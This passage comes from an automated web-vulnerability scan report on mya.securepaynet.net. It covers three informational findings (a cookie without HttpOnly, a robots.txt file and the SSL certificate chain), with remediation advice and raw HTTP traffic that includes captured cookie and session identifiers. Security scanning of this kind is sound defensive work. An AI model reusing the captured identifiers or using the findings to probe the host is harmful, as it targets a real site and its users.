MemAuthId459469=ddqbeevdkbjexhzduaqgfbzandeajelcgfdjvjscnhedderbhbdcbbndddfcfdbjbfcitgneqdyjgfjiuendydyabepcfdii; ShopperId459469=ygrcpggimjpdxbygfavdrjahkeeacfaj; MemShopperId459469=potableSourceStr=ygrcpggimjpdxbygfavdrjahkeeacfaj

Response

HTTP/1.1 200 OK
Date: Wed, 27 Oct 2010 21:50:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 265129


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><script
...[SNIP]...
</script><script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc_css/pl_20100611.js" xmlns:DataCache="urn:xsltDataCache"></script>
...[SNIP]...
</div><script type="text/JavaScript" src="https://rt.trafficfacts.com/tf.php?k=2946g2e1e1886f1f818d16e87fbc63d92efed34ea416bh13;c=s;v=2"></script>
...[SNIP]...

8. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mya.securepaynet.net
Path:   /products/accountlist.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /products/accountlist.aspx?ci=1815&product=hosting&prog_id=459469 HTTP/1.1
Host: mya.securepaynet.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: currency459469=potableSourceStr=USD; currencypopin459469=cdisplaypopin=false; flag459469=cflag=us; SiteWidth459469=1000; gdMyaHubble459469=ShopperID=hjlbxfjdvblibbigmishdjwhrabcpbve&Hubble=True; ShopperId459469=cetbeecepgqgtdhdaisijbddhjjgejti; adc459469=US; pathway=d6c169ee-a7dd-41fe-82d0-f24e6664c78a; pagecount=1; actioncount=; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; traffic=; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 302 Found
Date: Tue, 26 Oct 2010 05:15:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://idp.securepaynet.net/login.aspx?SPKey=SPMYA-M1PWMYAWEB011&redirect=false&myaurl=%2fproducts%2faccountlist.aspx&ci=1815&product=hosting&prog_id=459469
Set-Cookie: ASP.NET_SessionId=b2rojz554y05ix45gunhku55; path=/; HttpOnly
Set-Cookie: ShopperId459469=bcwemdfeljdhzfuhganjodefdblbnjtd; domain=securepaynet.net; expires=Mon, 26-Oct-2020 05:15:29 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 294

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://idp.securepaynet.net/login.aspx?SPKey=SPMYA-M1PWMYAWEB011&amp;redirect=false&amp;myaurl=%2fproducts%2faccount
...[SNIP]...

9. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mya.securepaynet.net
Path:   /account/orderhistory/orderhistory.aspx

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: mya.securepaynet.net

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
Last-Modified: Mon, 31 Aug 2009 22:39:02 GMT
Accept-Ranges: bytes
ETag: "c9bf88d68b2aca1:601"
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Tue, 26 Oct 2010 05:35:34 GMT
Connection: close

User-agent: *
Disallow: /

10. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mya.securepaynet.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  mya.securepaynet.net
Issued by:  Starfield Secure Certification Authority
Valid from:  Fri Mar 13 18:45:12 CDT 2009
Valid to:  Sun Apr 03 18:54:15 CDT 2011

Certificate chain #1

Issued to:  Starfield Secure Certification Authority
Issued by:  Starfield Class 2 Certification Authority
Valid from:  Wed Nov 15 19:15:40 CST 2006
Valid to:  Sun Nov 15 19:15:40 CST 2026

Certificate chain #2

Issued to:  Starfield Class 2 Certification Authority
Issued by:  Starfield Class 2 Certification Authority
Valid from:  Tue Jun 29 12:39:16 CDT 2004
Valid to:  Thu Jun 29 12:39:16 CDT 2034

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Wed Oct 27 17:34:18 CDT 2010.